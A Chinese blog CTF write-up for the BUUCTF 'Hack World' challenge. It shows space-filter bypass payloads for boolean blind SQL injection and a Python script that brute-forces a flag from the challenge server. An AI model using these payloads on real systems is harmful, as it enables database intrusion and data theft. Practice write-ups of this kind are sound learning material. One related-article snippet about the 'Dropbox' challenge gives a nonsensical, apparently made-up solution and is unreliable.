[CISCN2019 华北赛区 Day2 Web1]Hack World 布尔注入

最新推荐文章于 2024-02-28 21:29:25 发布
最新推荐文章于 2024-02-28 21:29:25 发布
阅读量143 收藏
点赞数
分类专栏: BUUctf SQL注入 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/133429127
版权

正确的值

错误的值 我们首先fuzz一下

发现空格被过滤了

我们首先测试

(1)=(1)
(1)=(2)

确定了是布尔注入了

我们写一下查询语句

(select(ascii(mid(flag,1,1))>1)from(flag))

(select(ascii(mid(flag,1,1))=102)from(flag))

确定了f 开头 我们开始写脚本

import string
import time

import  requests

base_url="""http://af13e36c-216d-4683-8de3-7d39ed6ff520.node4.buuoj.cn:81/index.php"""
req=''
for i in range(100):
    for j in string.printable:
        payload="(select(ascii(mid(flag,{},1))={})from(flag))".format(i,ord(j))
        data={"id":payload}
        r=requests.post(url=base_url,data=data)
        if "Hello, glzjin wants a girlfriend." in r.text:
            req += j
            print(req)
        else:
            continue
        if r.status_code == 429 :
            time.sleep(0.5)

慢慢跑就行了

双层小牛堡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[CISCN2019 华北赛区 Day2 Web1]Hack World
qq_46266956的博客
04-24 588
[CISCN2019 华北赛区 Day2 Web1]Hack World 注入题: 直接抓包burpsuite fuzz测试 过滤了一些关键字,但能够看出来存在bool漏洞 发现当true时,Hello,glzjin wants a girlfriend. fslse时,Error Occured When Fetch Result. 据此,写脚本 import requests import string import time timeout=None def bool_blind(url):
buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
m_de_g的博客
04-22 539
【代码】buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
2302_79800344的博客
02-28 1307
【代码】[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解。
BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World
weixin_74911687的博客
03-03 569
BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World
国赛华北赛区Day1Web2源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web2源码+学习说明.zip
国赛华北赛区Day1Web1源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web1源码+学习说明.zip
国赛 2019 华北赛区 Web 题目
最新发布
05-19
ciscn
利用PHAR协议进行PHP反序列化攻击1
08-03
乎所有件操作函数都可触发 phar 反序列化题地址:[CISCN2019 华北赛区 Day1 Web1]Dropbox(链接:进题后,随意注册账号上传件,上传点
2019华北电力大学全日制学士学位招生目录1
08-03
① 101 思想政治理论 ② 201 英语一 ③ 301 数学一 ④ 811 电力系统分析基础 ① 电力系统综合 ② 高电压技术 ③ 电力电子技术 ① 发电厂电
【CTF-web】buuctf-[CISCN2019 华北赛区 Day2 Web1]Hack Worldsql盲注)
Sankkl1的博客
08-18 420
根据上图可知,页面中已经告诉我们要从flag表中的flag列取出flag,思考是sql注入。经过抓包发现发post包中的id字段是注入点。同时还发现是盲注,即当存在SQL注入时,攻击者无法通过页面或请求的返回信息,回显或获取到SQL注入语句的执行结果。由此可以通过if函数来测试flag每一位的值,以下为编写的测试脚本。经测试当输入id=1时,结果为。,发现过滤了空格、#等符号。,当id=2时,结果为。
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World
qq_60829702的博客
10-22 612
使用二分法就是快呀,大家可以运行这两个脚本比较一下,我刚开始是用第二个的,后面用了第一个。这两个就不是一个级别的,这里我编写二分法脚本的时候也出现了一点问题,然后看其他师傅的文章借鉴了一下。看到这里确实是可以的,但是当我们输入id=0的时候也会显示这个错误,所以我们就不需要使用异或了,直接就是布尔盲注就行了。按照正常的思路,就是找到注入点后就看能不能使其闭合了,但没办法过滤了太多了,我们使用bp看一下过滤了哪些东西。我这里有两个脚本一个二分法的,一个就是直接暴力比较的脚本,有需要可以自取。
BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World
末初的CSDN博客
11-05 7592
题目地址:https://buuoj.cn/challenges#[CISCN2019%20%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA%20Day2%20Web1]Hack%20World SQL注入 手工测试时发现有过滤,那就先Fuzz测试过滤了哪些字符 Length=482的都是被过滤的字符 测试注入点,发现是盲注,直接查flag表flag字段的内容 Trick 使用中括号()代替空格 常规盲注测试,都无需查库查表查字段了,都给出来,直接查flag内容 i.
[ciscn2019 华北赛区 day1 web1]dropbox
06-06
这是一道Web安全题目,要求我们通过访问网站,获取到flag。 题目中给出了一个网站地址,我们可以直接访问该网站。进入网站后,我们可以看到一个登录界面,要求我们输入用户名和密码。 我们可以尝试一些常见的用户名和密码,但是都无法登录成功。因此,我们需要通过其他方式来获取flag。 我们可以尝试一些常见的Web漏洞,比如SQL注入、XSS等。在这个题目中,我们可以尝试一些文件上传漏洞。 我们可以通过Burp Suite等工具,来拦截网站的上传请求,然后修改上传的文件,来获取flag。 具体的操作步骤如下: 1. 使用Burp Suite等工具,拦截上传请求。 2. 修改上传的文件,将文件名改为flag.php。 3. 将上传的文件类型改为php。 4. 将上传的文件内容改为以下内容: <?php echo "flag{xxxxxxxxxxxxxxxxxxxx}"; ?> 其中,xxxxxxxxxxxxxxxxxxxx为flag的具体内容。 5. 发送修改后的上传请求,上传文件。 6. 访问上传的文件,即可获取flag。 通过以上步骤,我们就可以成功获取到flag了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值